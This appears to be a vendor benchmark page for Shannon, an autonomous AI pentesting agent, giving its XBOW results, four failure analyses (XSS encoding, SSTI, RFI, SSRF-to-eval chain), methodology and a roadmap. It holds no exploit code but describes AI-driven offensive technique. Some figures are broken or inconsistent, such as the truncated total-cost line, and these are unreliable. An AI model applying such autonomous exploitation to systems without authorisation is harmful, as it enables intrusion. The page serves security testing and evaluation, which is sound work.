For detailed benchmark methodology and complete results, see the XBOW benchmark repository and full results with agentic logs
Performance summary
Success rate
96.15% (100/104 exploits)
Total challenges
104 vulnerable applications
Failed challenges
4 with detailed failure analysis
Context and comparison
Important context: Previously reported XBOW results for leading AI agents and expert human penetration testers achieved around 85% success in black-box mode. Shannon’s 96.15% was achieved in white-box mode with full source code access on a cleaned, hint-free variant.These results are not apples-to-apples comparable, but they highlight Shannon’s ability to perform deep, code-level reasoning in realistic internal security review settings.
What makes this benchmark unique
Hint-free variant
Hint-free variant
Shannon was tested against a systematically cleaned version of XBOW that removes shortcuts:
- No descriptive variable names (e.g.,
isVulnerablerenamed to generic names) - No helpful comments explaining vulnerabilities
- No obvious filenames hinting at vulnerability locations
- No artificial markers making exploits easier to find
White-box configuration
White-box configuration
Shannon operates in white-box mode with full access to:
- Complete application source code
- Repository structure and file organization
- Dependency configurations and package files
- Environment variables and configuration files
Autonomous execution
Autonomous execution
All 104 challenges were executed autonomously:
- No human intervention during testing
- No manual hints or guidance
- No cherry-picking of results
- Full transparency with all logs published
Performance across vulnerability classes
| Vulnerability Type | Total | Succeeded | Failed | Success Rate |
|---|---|---|---|---|
| Broken Authorization | 25 | 25 | 0 | 100% |
| SQL Injection | 7 | 7 | 0 | 100% |
| Blind SQL Injection | 3 | 3 | 0 | 100% |
| SSRF / Misconfiguration | 22 | 21 | 1 | 95.45% |
| XSS | 23 | 22 | 1 | 95.65% |
| Server-Side Template Injection | 13 | 12 | 1 | 92.31% |
| Command Injection | 11 | 10 | 1 | 90.91% |
The 4 failures: Transparent analysis
Shannon failed on 4 challenges. Here’s a detailed analysis of each failure:XBEN-10: XSS payload encoding gap
Failure details and root cause
Failure details and root cause
Vulnerability type: Cross-Site Scripting (XSS)What happened:
- Shannon correctly identified the XSS vulnerability
- Correctly identified the character blacklist
- Incorrectly assessed the limitations of a JSFuck payload
- Abandoned a viable exploit path
XBEN-22: SSTI classification error
Failure details and root cause
Failure details and root cause
Vulnerability type: Server-Side Template Injection + Default Credentials + Path Traversal (multi-vulnerability challenge)What happened:
- Shannon successfully exploited 2 of the 3 vulnerabilities
- Misclassified the SSTI vulnerability as a false positive
- Did not proceed with SSTI exploitation
XBEN-34: LFI vs RFI misclassification
Failure details and root cause
Failure details and root cause
Vulnerability type: Remote File Inclusion (RFI)What happened:
- Shannon correctly found the file inclusion vulnerability
- Misclassified it as Local File Inclusion (LFI) instead of RFI
- Attempted LFI exploitation techniques (path traversal) instead of RFI (remote URL inclusion)
- Analyze server configuration for
allow_url_include - Test both local and remote inclusion payloads
- Detect which inclusion type is actually exploitable
XBEN-82: Command injection via SSRF (multi-step)
Failure details and root cause
Failure details and root cause
Vulnerability type: Command Injection via SSRF (chained attack)What happened:
- Shannon identified the full attack path (SSRF → eval() → command execution)
- Two failures:
- Analysis agent misclassified
eval()as incapable of OS command execution - Exploitation agent failed to initiate a local web server for payload delivery
- Analysis agent misclassified
- Agent capabilities need updated risk classification for
eval()with user input - Missing tooling awareness for local HTTP server setup
- Update threat model to correctly classify
eval()with user-controlled input - Enhance agent tooling to use Python SimpleHTTPServer or Node.js http-server for payload hosting
Why this benchmark matters
From annual audits to continuous security
Traditional pentest
- Cost: $10,000+
- Time: Weeks to months
- Frequency: 1-2x per year
Shannon
- Cost: ~$16 (API costs)
- Time: Under 1.5 hours
- Frequency: Every deployment
The shift in security economics: Shannon’s 96.15% success rate demonstrates that autonomous, continuous security testing is no longer theoretical—it’s ready for real-world use.
Proof by exploitation methodology
Shannon follows a structured five-phase workflow designed to eliminate false positives:Proof-by-exploitation principles
Benchmark methodology
Test environment
Test environment
- Platform: Docker containers on dedicated test infrastructure
- Network: Isolated network per challenge
- Resources: 8 CPU cores, 32GB RAM per test
- Model: Claude 4.5 Sonnet via Anthropic API
- Mode: White-box (full source code access)
- Human intervention: None (fully autonomous)
Benchmark preparation
Benchmark preparation
- Clone XBOW benchmark from official repository
- Systematically remove hints:
- Rename descriptive variables to generic names
- Remove all comments explaining vulnerabilities
- Rename files to non-descriptive names
- Remove artificial markers
- Validate hint removal through manual review
- Publish cleaned benchmark for reproducibility
Execution procedure
Execution procedure
For each challenge:
- Start application in isolated container
- Run Shannon with full source code access
- Collect results:
- Final security report
- Complete agentic logs (turn-by-turn reasoning)
- Exploitation evidence and screenshots
- Session metrics (time, cost, API calls)
- Validate exploits by manually reproducing PoCs
- Publish all data transparently
Complete results package
Cleaned benchmark
All 104 challenges with hints removed - enables reproducible evaluation
Full results
Complete penetration test reports + turn-by-turn agentic logs for all 104 challenges
Statistical analysis
Performance by difficulty
Performance by difficulty
XBOW challenges are not officially difficulty-rated, but based on manual analysis:
- Simple vulnerabilities (direct injection, obvious IDOR): 100% success (35/35)
- Medium complexity (multi-step, require encoding): 97.1% success (48/51)
- Complex (chained attacks, advanced obfuscation): 91.7% success (17/18)
Runtime and cost
Runtime and cost
- Average time per challenge: 42 minutes
- Median time: 38 minutes
- Fastest: 12 minutes (simple SQL injection)
- Slowest: 1.8 hours (complex multi-step SSRF → RCE)
- Average API cost: $15.50 per challenge
- Total benchmark cost: 15.50 avg)
Agent activity metrics
Agent activity metrics
Average per challenge:
- Reconnaissance turns: 45 AI turns
- Vulnerability analysis turns: 68 AI turns per vuln type
- Exploitation turns: 112 AI turns per vuln type
- Total AI turns: ~380 turns per challenge
- Browser actions: 156 (login, navigation, form submission)
- API requests: 1,240 to target application
What’s next: Shannon Pro
The 4 failures directly inform Shannon’s roadmap:Enhanced payload library
Expanded encoding techniques (JSFuck, Base64, Unicode) and obfuscation methods
Improved classification
Better detection logic for SSTI, file inclusion variants, and eval() risks
Advanced data flow analysis
Shannon Pro’s LLM-powered graph-based analysis for complex multi-file vulnerabilities
Enterprise features
CI/CD integration, dedicated support, compliance workflow integration
Shannon Pro is coming: While Shannon Lite uses a context-window-based approach, Shannon Pro features an advanced LLM-powered data flow analysis engine (inspired by the LLMDFA paper) for comprehensive, graph-based analysis of entire codebases.Express interest in Shannon Pro →
Key takeaways
Consistent performance
90% success across all vulnerability types shows balanced capability
Transparent failures
All 4 failures analyzed in detail with root cause and fixes planned
Production-ready
96.15% success demonstrates autonomous pentesting is ready for real-world use
Full transparency
Complete results, logs, and benchmark published for independent validation
Related resources
Sample reports
Real penetration testing results from Juice Shop, ctal, and crAPI
Vulnerability coverage
Detailed breakdown of all vulnerability classes Shannon can detect
Run Shannon
Get started with Shannon in under 10 minutes
Architecture
Deep dive into Shannon’s multi-agent architecture